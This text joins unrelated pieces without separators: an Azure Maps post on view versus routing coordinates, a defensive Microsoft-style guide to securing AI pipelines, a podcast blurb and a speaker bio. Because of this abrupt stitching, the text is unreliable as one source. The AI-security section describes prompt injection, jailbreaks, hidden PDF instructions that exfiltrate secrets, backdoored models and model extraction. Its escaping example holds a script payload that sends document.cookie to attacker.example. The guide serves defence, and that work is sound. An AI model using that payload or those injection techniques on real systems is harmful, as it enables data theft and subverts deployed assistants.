When you work with Azure Maps long enough, you will eventually run into a subtle but important detail: the platform returns two different types of coordinates for the same address. And while they may look interchangeable, they behave very differently once you start routing, calculating travel times, or dropping pins on a map.
Let’s break down what each represents and how to use them correctly when building location‑intelligent applications.
Geocoders, including Azure Maps, are designed to satisfy two competing needs: showing where a place is on a map, and getting a traveler to that place via the road network.
The coordinate that satisfies the first need is rarely the same as the one that satisfies the second; in fact, the two can be wildly far apart. If you have ever visited a national park or another large site where the entrance sits far from the point you would use to center the map, you have seen this firsthand: the two coordinates can be miles apart, and you often can't drive to the exact center at all, so the view coordinate is not routable. Azure Maps therefore provides them separately: one powers the visual map experience, the other powers the routing engine.
Think of the Azure Maps view coordinate as “the place where the map pin should sit.” It may come from an address parcel, a building footprint centroid, or a point-of-interest geometry. Azure Maps returns whichever option produces the most natural visual representation of the feature on the map.
This is the important part for our topic: a view coordinate is not guaranteed to land on a road or even near one. It might be in the center of a large warehouse, deep inside a shopping mall footprint, or somewhere else that makes sense visually but is effectively unreachable from the road network.
View coordinates are great for anything that involves visual context such as placing a point on the map, centering the map on a search result, running spatial clustering on data values, or doing proximity lookups. They’re simply not intended for navigation.
Routing coordinates serve a very different purpose. Azure Maps generates them to represent an access point: the point where a vehicle, pedestrian, or cyclist can legally and realistically approach or leave the location from the road network.
This usually means a point on or adjacent to the road network, such as a driveway, a parking-lot entrance, or the street segment closest to the building's entrance.
When you're calling Azure Maps Routing APIs—calculateRoute, routeRange, distance matrices, isochrones, multi‑itinerary optimization—you should always feed the routing coordinate into the engine. Feeding a view coordinate instead may cause the service to snap to the wrong part of the network, or worse, find no viable route at all.
Azure Maps surfaces routing coordinates and view coordinates through structured fields in its search and geocoding responses; the exact field names vary by API.
Azure Maps provides both; if your scenario involves travel or movement (even indirectly), the routing coordinate is the authoritative choice.
If you use a view coordinate for routing, you may end up requesting routes that terminate inside a building footprint, on the wrong side of the street, or at the wrong driveway. You might also see unexpected route endpoints because the routing engine is forced to snap the point to whichever road segment it thinks is closest, which may not be the correct one.
On the other hand, if you use a routing coordinate for display, your pins may look "off" because the access point for an address could be far from the building’s center.
This is why the distinction matters: one is about visual placement, the other about navigability.
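To make that concrete, here is a minimal Python sketch of the pattern: geocode an address, keep one coordinate for the map pin and the other for the route request. The endpoint paths follow the Azure Maps Search and Route Directions REST APIs, but the response field names used here (`position` for the view coordinate, an `entryPoints` list for the access point) and the example addresses are assumptions to verify against the API version you call.

```python
import os
import requests

SUBSCRIPTION_KEY = os.environ["AZURE_MAPS_KEY"]  # assumed to be set in the environment

def geocode(address: str) -> dict:
    """Geocode an address and return both coordinate flavors (field names are assumptions)."""
    resp = requests.get(
        "https://atlas.microsoft.com/search/address/json",
        params={"api-version": "1.0", "subscription-key": SUBSCRIPTION_KEY, "query": address},
        timeout=10,
    )
    resp.raise_for_status()
    result = resp.json()["results"][0]
    view = result["position"]                     # where the pin should sit
    entry_points = result.get("entryPoints", [])  # access points for routing, if present
    routing = entry_points[0]["position"] if entry_points else view  # fall back to the view point
    return {"view": view, "routing": routing}

def route_between(origin: dict, destination: dict) -> dict:
    """Request driving directions between two routing coordinates."""
    query = f'{origin["lat"]},{origin["lon"]}:{destination["lat"]},{destination["lon"]}'
    resp = requests.get(
        "https://atlas.microsoft.com/route/directions/json",
        params={"api-version": "1.0", "subscription-key": SUBSCRIPTION_KEY, "query": query},
        timeout=10,
    )
    resp.raise_for_status()
    return resp.json()

warehouse = geocode("1 Microsoft Way, Redmond, WA")   # hypothetical example address
depot = geocode("400 Broad St, Seattle, WA")          # hypothetical example address

# Drop the pin at the view coordinate...
print("Pin at:", warehouse["view"])
# ...but feed the routing coordinate to the routing engine.
route = route_between(depot["routing"], warehouse["routing"])
print(route["routes"][0]["summary"])
```

The fallback to the view coordinate when no entry point is returned mirrors what you would likely do in production: route to the best available access point rather than silently dropping the result.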
When building an end‑to‑end Azure Maps experience, a good mental model is: use the view coordinate for everything the user sees on the map, and the routing coordinate for anything that involves travel.
That includes distance calculations, service‑area modeling, route planning, delivery optimization, pickup/drop-off flows, fleet operations, and anything else where “how the user gets there” matters just as much as “where it is.”
With this separation of geocode results, you can trust Azure Maps to keep your visual experience clean while ensuring the routing engine has the precision it needs to get users where they actually need to go.
To find out more about Azure Maps Geocoding and our new Azure Maps AutoComplete experience, check out Search for a location using Azure Maps Search services | Microsoft Learn
In our first post, we established why securing AI workloads is mission-critical for the enterprise. Now, we turn to the AI pipeline—the end-to-end journey from raw data to deployed models—and explore why every stage must be fortified against evolving threats. As organizations accelerate AI adoption, this pipeline becomes a prime target for adversaries seeking to poison data, compromise models, or exploit deployment endpoints.
Enterprises don’t operate a single “AI system”; they run interconnected pipelines that transform data into decisions across a web of services, models, and applications. Protecting this chain demands a holistic security strategy anchored in Zero Trust for AI, supply chain integrity, and continuous monitoring. In this post, we map the pipeline, identify key attack vectors at each stage, and outline practical defenses using Microsoft’s security controls—spanning data governance with Purview, confidential training environments in Azure, and runtime threat detection with Defender for Cloud.
Our guidance aligns with leading frameworks, including the NIST AI Risk Management Framework and MITRE ATLAS, ensuring your AI security program meets recognized standards while enabling innovation at scale.
Securing AI isn’t just about protecting a single model—it’s about safeguarding the entire pipeline that transforms raw data into actionable intelligence. This pipeline spans multiple stages, from data collection and preparation to model training, validation, and deployment, each introducing unique risks that adversaries can exploit. Data poisoning, model tampering, and supply chain attacks are no longer theoretical—they’re real threats that can undermine trust and compliance. By viewing the pipeline through a security lens, organizations can identify these vulnerabilities early and apply layered defenses such as Zero Trust principles, data lineage tracking, and runtime monitoring. This holistic approach ensures that AI systems remain resilient, auditable, and aligned with enterprise risk and regulatory requirements.
Sources: enterprise apps, data lakes, web, partners.
Key risks: poisoning, PII leakage, weak lineage, and shadow datasets. Frameworks call for explicit governance and provenance at this earliest stage. [nist.gov]
The Reference Architecture for Zero Trust in AI establishes a security-first blueprint for the entire AI pipeline—from raw data ingestion to model deployment and continuous monitoring. Its importance lies in addressing the unique risks of AI systems, such as data poisoning, model tampering, and adversarial attacks, which traditional security models often overlook. By embedding Zero Trust principles at every stage—governance with Microsoft Purview, isolated training environments, signed model artifacts, and runtime threat detection—organizations gain verifiable integrity, regulatory compliance, and resilience against evolving threats. Adopting this architecture ensures that AI innovations remain trustworthy, auditable, and aligned with business and compliance objectives, ultimately accelerating adoption while reducing risk and safeguarding enterprise reputation.
Why this matters: treating every pipeline stage as an explicit, verifiable control point removes the implicit trust that attackers exploit and creates the audit trail regulators increasingly expect. Differentially private (DP) training adds a further layer by bounding how much any single record, including a poisoned one, can influence the trained model.
Bottom line: DP is a valuable layer for privacy and resilience, but it must be combined with data validation, anomaly detection, and provenance checks to effectively mitigate poisoning risks. [arxiv.org], [dp-ml.github.io]
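To make the DP point concrete, the sketch below shows the per-example gradient clipping and Gaussian noising at the heart of DP-SGD for a toy linear model, using plain NumPy. It is a minimal illustration of why a single poisoned record has bounded influence, not a production recipe; real training would use a vetted library (e.g., Opacus or TensorFlow Privacy) with a proper privacy accountant.

```python
import numpy as np

rng = np.random.default_rng(0)

# Toy data: linear regression with a known weight vector.
X = rng.normal(size=(256, 5))
y = X @ np.array([1.0, -2.0, 0.5, 0.0, 3.0]) + rng.normal(scale=0.1, size=256)

w = np.zeros(5)
clip_norm = 1.0      # C: max L2 norm any single example's gradient may contribute
noise_mult = 1.1     # sigma: noise scale relative to C (drives the privacy budget)
lr = 0.1
batch_size = 64

for step in range(200):
    idx = rng.choice(len(X), size=batch_size, replace=False)
    # Per-example gradients of squared error for a linear model.
    residual = X[idx] @ w - y[idx]                      # shape (batch,)
    per_example_grads = 2 * residual[:, None] * X[idx]  # shape (batch, dim)

    # Clip each example's gradient so no one record (poisoned or not) dominates.
    norms = np.linalg.norm(per_example_grads, axis=1, keepdims=True)
    clipped = per_example_grads / np.maximum(1.0, norms / clip_norm)

    # Sum, add calibrated Gaussian noise, and average.
    noisy_sum = clipped.sum(axis=0) + rng.normal(scale=noise_mult * clip_norm, size=w.shape)
    w -= lr * noisy_sum / batch_size

print("learned weights:", np.round(w, 2))
```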
Mitigations & Integrations
Use Purview’s automated scanning and classification to detect PII, PHI, financial data, and other regulated fields across your data estate. Apply sensitivity labels and tags to enforce consistent governance policies. [microsoft.com]
Implement Data Loss Prevention (DLP) rules to block unauthorized movement of sensitive data and prevent accidental leaks. Combine this with role-based access control (RBAC) and attribute-based access control (ABAC) to restrict who can view, modify, or export sensitive datasets.
Feed Purview alerts and lineage events into your SIEM/XDR workflows for real-time monitoring. Automate policy enforcement in CI/CD pipelines to ensure models only train on approved, sanitized datasets.
Schedule recurring scans and leverage Purview’s compliance dashboards to validate adherence to regulatory frameworks like GDPR, HIPAA, and NIST RMF.
For externally sourced data, sandbox ingestion and run poisoning heuristics; if using differential privacy (DP) in training, document the tradeoffs (utility vs. robustness). [aclanthology.org], [dp-ml.github.io]
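As a sketch of the CI/CD enforcement described above, the snippet below gates a training job on a dataset manifest that records a Purview-style sensitivity label and a content hash. The manifest format, label names, and `dataset_manifest.json` path are all hypothetical; the point is the pattern of failing the pipeline before any unapproved or tampered data reaches training.

```python
import hashlib
import json
import pathlib
import sys

APPROVED_LABELS = {"General", "Confidential-Approved"}  # hypothetical label taxonomy

def sha256_of(path: pathlib.Path) -> str:
    """Hash the dataset file so the manifest entry can be verified."""
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 20), b""):
            digest.update(chunk)
    return digest.hexdigest()

def gate(manifest_path: str = "dataset_manifest.json") -> None:
    """Fail the pipeline (non-zero exit) unless every dataset is labeled, approved, and unmodified."""
    manifest = json.loads(pathlib.Path(manifest_path).read_text())
    for entry in manifest["datasets"]:
        path = pathlib.Path(entry["path"])
        if entry.get("sensitivity_label") not in APPROVED_LABELS:
            sys.exit(f"BLOCKED: {path} has unapproved label {entry.get('sensitivity_label')!r}")
        if sha256_of(path) != entry["sha256"]:
            sys.exit(f"BLOCKED: {path} does not match its recorded hash (possible tampering)")
    print("All datasets approved and verified; proceeding to training.")

if __name__ == "__main__":
    gate()
```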
Attack Scenarios
Attackers craft malicious prompts or embed hidden instructions in user input or external content (e.g., documents, URLs).
Impact: Can lead to data exfiltration, policy bypass, and unbounded API calls, escalating operational costs and exposing sensitive data.
Mitigation: Implement prompt sanitization, context isolation, and rate limiting.
If model outputs are rendered in applications without proper sanitization, attackers can inject scripts or HTML tags into responses.
Impact: Cross-site scripting (XSS), remote code execution, or privilege escalation in downstream systems.
Mitigation: Apply output encoding, content security policies, and strict validation before rendering model outputs.
Reference: OWASP’s LLM Top 10 lists this as a major risk under insecure output handling. [owasp.org], [securitybo…levard.com]
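As a minimal illustration of the output-encoding mitigation, the sketch below HTML-escapes model output before it is rendered, so any injected markup is displayed as text rather than executed. It uses only the Python standard library; in a real web app you would also rely on your framework's auto-escaping templates and a content security policy.

```python
import html

def render_model_output(raw_output: str) -> str:
    """Escape model output so injected markup renders as inert text."""
    return f"<div class='assistant-reply'>{html.escape(raw_output)}</div>"

# A response poisoned with a script tag is neutralized before rendering.
malicious = 'Here is your summary. <script>fetch("https://attacker.example/?c="+document.cookie)</script>'
print(render_model_output(malicious))
# -> the <script> tag is emitted as &lt;script&gt;... and never executes in the browser
```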
Malicious or manipulated data introduced during ingestion (e.g., partner feeds, web scraping) skews model behavior or embeds backdoors.
Mitigation: Data validation, anomaly detection, provenance tracking.
Attackers use high-volume queries or gradient-based techniques to extract model weights or replicate functionality.
Mitigation: Rate limiting, watermarking, query monitoring.
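Rate limiting is easy to prototype; below is a small token-bucket sketch that throttles per-client inference calls, which also gives you a natural place to log query volume for extraction monitoring. Bucket sizes and refill rates are placeholder values; production systems would typically enforce this at the gateway (e.g., Azure API Management) rather than in application code.

```python
import time
from collections import defaultdict
from dataclasses import dataclass, field

@dataclass
class TokenBucket:
    capacity: float = 60.0        # max burst of requests per client (placeholder)
    refill_per_sec: float = 1.0   # sustained requests/second allowed (placeholder)
    tokens: float = 60.0
    last_refill: float = field(default_factory=time.monotonic)

    def allow(self) -> bool:
        now = time.monotonic()
        self.tokens = min(self.capacity, self.tokens + (now - self.last_refill) * self.refill_per_sec)
        self.last_refill = now
        if self.tokens >= 1.0:
            self.tokens -= 1.0
            return True
        return False

buckets: dict[str, TokenBucket] = defaultdict(TokenBucket)

def handle_inference(client_id: str, prompt: str) -> str:
    """Gate each inference call; rejected calls are a signal worth logging for extraction analysis."""
    if not buckets[client_id].allow():
        return "429: rate limit exceeded"
    return f"(model answer for {len(prompt)}-char prompt)"

print(handle_inference("tenant-a", "hello"))
```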
Compromise of pre-trained models or fine-tuning checkpoints from public repositories.
Mitigation: Signed artifacts, integrity checks, trusted sources.
Inputs crafted to exploit model weaknesses, causing misclassification or unsafe outputs.
Mitigation: Adversarial training, robust input validation.
Attackers infer PII/PHI from model outputs or embeddings.
Mitigation: Differential Privacy, access controls, privacy-enhanced design.
LLMs calling plugins or APIs without proper sandboxing can lead to unauthorized actions.
Mitigation: Strict permissioning, allowlists, and isolation.
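A simple allowlist gate for agent tool calls, sketched below, captures the strict-permissioning idea: every requested tool invocation is checked against an explicit per-agent allowlist before it runs. The tool names and registry are hypothetical placeholders.

```python
from typing import Callable

# Hypothetical tool registry: only these functions are ever reachable by the agent.
TOOLS: dict[str, Callable[..., str]] = {
    "search_docs": lambda query: f"results for {query!r}",
    "get_weather": lambda city: f"weather for {city}",
}

# Per-agent allowlist: the support agent may search docs, nothing else.
ALLOWLIST: dict[str, set[str]] = {"support-agent": {"search_docs"}}

def call_tool(agent_id: str, tool_name: str, **kwargs) -> str:
    """Refuse any tool call that is not explicitly permitted for this agent."""
    if tool_name not in ALLOWLIST.get(agent_id, set()):
        raise PermissionError(f"{agent_id} is not permitted to call {tool_name}")
    if tool_name not in TOOLS:
        raise KeyError(f"unknown tool: {tool_name}")
    return TOOLS[tool_name](**kwargs)

print(call_tool("support-agent", "search_docs", query="refund policy"))   # allowed
# call_tool("support-agent", "get_weather", city="Oslo")                  # raises PermissionError
```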
Additional Mitigations & Integrations considerations
Attackers compromise publicly available or third-party pre-trained models by embedding hidden behaviors (e.g., triggers that activate under specific inputs).
Impact: Silent backdoors can cause targeted misclassification or data leakage during inference.
Mitigation: Source models only from trusted repositories, verify signed artifacts and checksums, and run behavioral and backdoor-trigger testing before promotion.
Malicious actors publish packages with the same name as internal dependencies to public repositories. If build pipelines pull these packages, attackers gain code execution.
Impact: Compromised training or deployment environments, leading to model tampering or data exfiltration.
Mitigation: Pin dependency versions, pull from private package feeds with scoped namespaces, and verify package hashes against lockfiles in the build pipeline.
If model artifacts (weights, configs, containers) are not cryptographically signed, attackers can replace them with malicious versions.
Impact: Deployment of compromised models or containers without detection.
Mitigation: Cryptographically sign model weights, configs, and containers, and verify signatures before any deployment.
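Here is a minimal sketch of artifact integrity checking, using an HMAC over a SHA-256 digest with Python's standard library. The manifest layout and key handling are placeholders; a production setup would use asymmetric signing and managed keys (e.g., Sigstore/cosign or Azure Key Vault) rather than a shared secret.

```python
import hashlib
import hmac
import json
import pathlib

SIGNING_KEY = b"replace-with-key-from-a-vault"  # placeholder; never hard-code real keys

def digest_file(path: pathlib.Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()

def sign_artifact(path: pathlib.Path) -> dict:
    """Produce a manifest entry binding the artifact's content hash to a signature."""
    content_hash = digest_file(path)
    signature = hmac.new(SIGNING_KEY, content_hash.encode(), hashlib.sha256).hexdigest()
    return {"artifact": path.name, "sha256": content_hash, "signature": signature}

def verify_artifact(path: pathlib.Path, entry: dict) -> bool:
    """Reject the artifact if its hash or signature no longer matches the manifest."""
    content_hash = digest_file(path)
    expected = hmac.new(SIGNING_KEY, content_hash.encode(), hashlib.sha256).hexdigest()
    return content_hash == entry["sha256"] and hmac.compare_digest(expected, entry["signature"])

model_path = pathlib.Path("model.onnx")            # hypothetical artifact path
model_path.write_bytes(b"fake model weights")      # stand-in content so the sketch runs standalone
manifest = sign_artifact(model_path)
print(json.dumps(manifest, indent=2))
print("verified:", verify_artifact(model_path, manifest))
```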
Attackers gain access to the model registry and alter metadata or inject malicious artifacts.
Mitigation: RBAC, MFA, audit logging, and registry isolation.
CI/CD pipeline compromised to inject malicious code during model packaging or containerization.
Mitigation: Secure build environments, signed commits, and pipeline integrity checks.
Malicious base images used for model deployment introduce vulnerabilities or malware.
Mitigation: Use trusted container registries, scan images for CVEs, and enforce image signing.
Attackers upload artifacts with similar names or versions to confuse operators and bypass validation.
Mitigation: Strict naming conventions, artifact fingerprinting, and automated validation.
Attackers craft malicious queries or embed hidden instructions in user input or retrieved content to manipulate model behavior.
Impact: Policy bypass, sensitive data leakage, or execution of unintended actions via connected tools.
Mitigation: Sanitize and isolate retrieved content from instructions, apply prompt-injection classifiers such as Prompt Shields, and grant connected tools least-privilege access.
Attackers exploit weaknesses in safety guardrails by chaining prompts or using obfuscation techniques to override restrictions.
Impact: Generation of harmful, disallowed, or confidential content; reputational and compliance risks.
Mitigation: Layer content filters with system-prompt hardening, run continuous red teaming against known jailbreak patterns, and log and review blocked attempts.
High-volume or structured queries designed to infer model parameters or replicate its functionality.
Impact: Intellectual property theft, exposure of proprietary model logic, and enabling downstream attacks.
Mitigation: Rate limiting and quotas, query-pattern monitoring, and output watermarking.
LLM agents calling APIs without sandboxing can trigger unauthorized actions.
Mitigation: Strict allowlists, permission gating, and isolated execution environments.
Unsanitized outputs rendered in apps or dashboards can lead to XSS or command injection.
Mitigation: Output encoding, validation, and secure rendering practices.
Attackers exploit container or VM vulnerabilities hosting inference services.
Mitigation: Harden runtime environments, apply OS-level security patches, and enforce network isolation.
Observing timing, resource usage, or error messages to infer sensitive details about the model or data.
Mitigation: Noise injection, uniform response timing, and error sanitization.
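Uniform response timing can be approximated by padding every response to a fixed floor, so completion time reveals less about what happened internally. Below is a minimal sketch, assuming an illustrative 500 ms floor, that also shows the error-sanitization idea of returning a generic message to callers.

```python
import time

RESPONSE_FLOOR_SECONDS = 0.5  # illustrative floor; tune to your worst-case handler latency

def answer_with_uniform_timing(handler, *args, **kwargs):
    """Run a handler but never return faster than the floor, and never leak internal errors."""
    start = time.monotonic()
    try:
        result = handler(*args, **kwargs)
    except Exception:
        result = "An error occurred."   # sanitized; details go to internal logs only
    elapsed = time.monotonic() - start
    if elapsed < RESPONSE_FLOOR_SECONDS:
        time.sleep(RESPONSE_FLOOR_SECONDS - elapsed)
    return result

print(answer_with_uniform_timing(lambda: "ok"))
```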
Attackers flood inference endpoints with requests, driving up compute costs.
Mitigation: Quotas, usage monitoring, and auto-scaling with cost controls.
Over time, input data distributions change (e.g., new slang, market shifts), causing the model to make less accurate predictions without obvious alerts.
Impact: Reduced accuracy, operational risk, and potential compliance violations if decisions become unreliable.
Mitigation: Monitor input and prediction distributions for drift, alert on threshold breaches, and trigger scheduled or automated retraining on fresh, validated data.
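Drift monitoring can start as simply as comparing recent production inputs against the training distribution. The sketch below uses a two-sample Kolmogorov-Smirnov test from SciPy per feature and flags anything below a chosen p-value threshold; the threshold and the synthetic data are illustrative only, and managed options such as Azure ML model monitoring cover this end to end.

```python
import numpy as np
from scipy.stats import ks_2samp

rng = np.random.default_rng(7)

# Reference window: features as seen at training time.
train_features = {"age": rng.normal(40, 10, 5000), "spend": rng.lognormal(3, 0.5, 5000)}
# Recent production window: "spend" has quietly shifted upward.
prod_features = {"age": rng.normal(40, 10, 2000), "spend": rng.lognormal(3.4, 0.5, 2000)}

P_VALUE_THRESHOLD = 0.01  # illustrative; tune to your tolerance for false alarms

for name in train_features:
    stat, p_value = ks_2samp(train_features[name], prod_features[name])
    drifted = p_value < P_VALUE_THRESHOLD
    print(f"{name:>6}: KS={stat:.3f} p={p_value:.4f} -> {'DRIFT' if drifted else 'ok'}")
    # In production, a DRIFT result would raise an alert and/or queue a retraining job.
```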
Model performance or decision bias changes for specific demographic or business segments due to evolving data or retraining.
Impact: Regulatory risk (GDPR, EEOC), reputational damage, and ethical concerns.
Mitigation: Track fairness and performance metrics per segment, alert on threshold breaches, and review retraining data for representativeness.
Attackers discover new prompt injection or jailbreak techniques that bypass safety filters after deployment.
Impact: Generation of harmful or disallowed content, policy violations, and security breaches.
Mitigation: Continuous red teaming, rapid updates to safety filters and system prompts, and runtime detection of known jailbreak patterns.
Unauthorized or outdated models running in production environments without governance.
Mitigation: Registry enforcement, signed artifacts, and deployment audits.
Backdoors introduced during training activate under rare conditions post-deployment.
Mitigation: Runtime scanning for anomalous triggers and adversarial input detection.
Attackers manipulate monitoring logs or metrics to hide drift or anomalies.
Mitigation: Immutable logging, cryptographic integrity checks, and SIEM integration.
Bots continuously hit inference endpoints, driving up operational costs unnoticed.
Mitigation: Rate limiting, usage analytics, and anomaly-based throttling.
Slow, distributed queries across months to replicate model behavior without triggering rate limits.
Mitigation: Long-term query pattern analysis and watermarking.
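One way to catch low-and-slow extraction is to look at cumulative query behavior per client over weeks rather than per-minute rates. The sketch below keeps a rolling record of distinct prompts per client and flags anyone whose long-horizon coverage looks like systematic probing; the window and threshold are placeholders.

```python
import time
from collections import defaultdict

WINDOW_SECONDS = 30 * 24 * 3600      # 30-day horizon (placeholder)
MAX_DISTINCT_PROMPTS = 50_000        # placeholder threshold for systematic coverage

# client_id -> list of (timestamp, prompt_hash)
history: dict[str, list[tuple[float, int]]] = defaultdict(list)

def record_query(client_id: str, prompt: str, now: float | None = None) -> bool:
    """Record a query and return True if the client's long-horizon pattern looks like extraction."""
    now = time.time() if now is None else now
    entries = history[client_id]
    entries.append((now, hash(prompt)))
    # Drop entries outside the rolling window.
    history[client_id] = [(t, h) for t, h in entries if now - t <= WINDOW_SECONDS]
    distinct = len({h for _, h in history[client_id]})
    return distinct > MAX_DISTINCT_PROMPTS

# Feed this from your inference gateway logs; a True result should raise a SIEM alert.
print("flag tenant-b:", record_query("tenant-b", "probe #123"))
```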
Symptom: Model looks great in CI, fails catastrophically on a subset in production.
Likely cause: Attacker tainted validation data so unsafe behavior was never detected. ATLAS documents validation‑stage attacks. [atlas.mitre.org]
Playbook: Quarantine the suspect validation set, re-evaluate the model on a trusted holdout, trace lineage to find when and how the data changed, and retrain on verified data before redeploying.
Symptom: The assistant “quotes” an external PDF that quietly exfiltrates secrets via instructions in hidden text.
Playbook: Isolate the offending document, rotate any secrets that may have been exposed, tighten filtering and tool permissions for retrieved content, and add the pattern to your prompt-injection test suite.
Symptom: Spiky usage, long prompts, and systematic probing.
Playbook: Throttle or block the offending clients, review long-term query patterns for extraction behavior, and consider watermarking or degrading responses to suspicious traffic.
Data Governance & Provenance
Microsoft Purview for classification, sensitivity labeling, lineage, and DLP across the data estate.
Secure Training
Isolated, confidential training environments in Azure, with network lockdown and training restricted to approved, versioned datasets.
Responsible AI
Safety guardrails such as content filtering and Prompt Shields, plus red teaming before release.
Runtime Safety & Threat Detection
Microsoft Defender for Cloud for runtime threat detection and alerting on AI workloads.
Enterprise‑grade LLM Access
Azure OpenAI with Azure Direct Models and Data Zones for privacy and data residency.
Monitoring & Continuous Improvement
Azure ML Model Monitoring (drift/quality) + Event Grid triggers for auto‑retrain; instrument with Application Insights for latency/reliability. [learn.microsoft.com]
Align your controls to the four functions of the NIST AI Risk Management Framework: Govern, Map, Measure, and Manage.
Days 0–30: Establish Foundations
Days 31–60: Shift‑Left & Gate Releases
Days 61–90: Runtime Defense & Observability
Q: Do differential privacy and adversarial training “solve” poisoning?
A: They reduce risk envelopes but do not eliminate attacks—plan for layered defenses and continuous validation. [arxiv.org], [dp-ml.github.io]
Q: How do we prevent indirect prompt injection in agentic apps?
A: Combine Spotlighting patterns, Prompt Shields, least‑privilege tool access, explicit consent for sensitive actions, and Defender for Cloud runtime alerts. [techcommun…rosoft.com], [learn.microsoft.com]
Q: Can we use Azure OpenAI without contributing our data to model training?
A: Yes. With Azure Direct Models, your prompts and completions remain private and are not used to train foundation models without your permission; with Data Zones, you can also meet data-residency requirements. [learn.microsoft.com], [azure.microsoft.com]
As your organization scales AI, the pipeline is the perimeter. Treat every stage—from data capture to model deployment—as a control point with verifiable lineage, signed artifacts, network isolation, runtime detection, and continuous risk measurement. But securing the pipeline is only part of the story—what about the models themselves? In our next post, we’ll dive into hardening AI models against adversarial attacks, exploring techniques to detect, mitigate, and build resilience against threats that target the very core of your AI systems.
#AIPipelineSecurity; #AITrustAndSafety; #SecureAI; #AIModelSecurity; #AIThreatModeling; #SupplyChainSecurity; #DataSecurity
AI tools continue to evolve - what can we do with them today? Richard chats with Cecilia Wirén about her experiences using the latest AI tools to support DevOps workflows, diagnostics, and the crafting of new scripts. Cecilia focuses on tools that help admins who only occasionally write scripts, including adopting a GitHub workflow to track the prompts and results generated by LLMs so you can always revert and learn from different approaches. The tools continue to evolve; it's worth looking at the latest features and models!
Recorded December 3, 2025
Keith Townsend is an independent CTO advisor and infrastructure practitioner focused on how enterprises actually adopt AI, cloud, and open-source platforms at scale. He’s the founder of The Advisor Bench and the voice behind The CTO Advisor, where he helps CIOs and CTOs navigate hard infrastructure decisions around hybrid cloud, AI systems, and platform architecture.
Keith has spent his career inside large enterprises and alongside vendors—working as an enterprise architect, consultant, and analyst—bridging the gap between engineering reality and executive decision-making. He’s known for translating complex systems into plain English and for challenging hype with operational truth.
Today, Keith advises enterprise IT leaders, moderates closed-door executive forums, and builds real AI systems himself—using open source not as ideology, but as a practical tool for control, portability, and long-term leverage.
You can follow Keith on Social Media
https://thectoadvisor.com/
https://www.youtube.com/channel/UCn73v-dZndutgl4s46fJwWw
https://www.linkedin.com/in/kltownsend
https://twitter.com/CTOAdvisor
PLEASE SUBSCRIBE TO THE PODCAST
- Spotify: http://isaacl.dev/podcast-spotify
- Apple Podcasts: http://isaacl.dev/podcast-apple
- Google Podcasts: http://isaacl.dev/podcast-google
- RSS: http://isaacl.dev/podcast-rss
You can check out more episodes of Coffee and Open Source on https://www.coffeeandopensource.com
Coffee and Open Source is hosted by Isaac Levin (https://twitter.com/isaacrlevin)